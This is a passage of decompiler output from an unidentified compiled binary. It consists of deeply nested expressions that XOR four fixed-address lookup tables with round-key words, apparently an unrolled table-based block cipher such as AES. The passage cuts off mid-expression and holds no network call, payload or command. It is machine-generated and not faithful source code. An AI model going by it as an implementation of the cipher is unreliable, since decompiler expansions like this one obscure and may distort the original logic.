*(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x18) * 4) ^  *(0x413dc8 + (_t158 & 0x000000ff) * 4) ^ _t242[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t229 >> 0x18) * 4) ^  *(0x413dc8 + (_t229 & 0x000000ff) * 4) ^ _t242[4];
							_t243 =  &(_t242[5]);
							 *(_t248 + 0x18) = _t243;
							_t164 = _t243;
							_t234 =  *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + 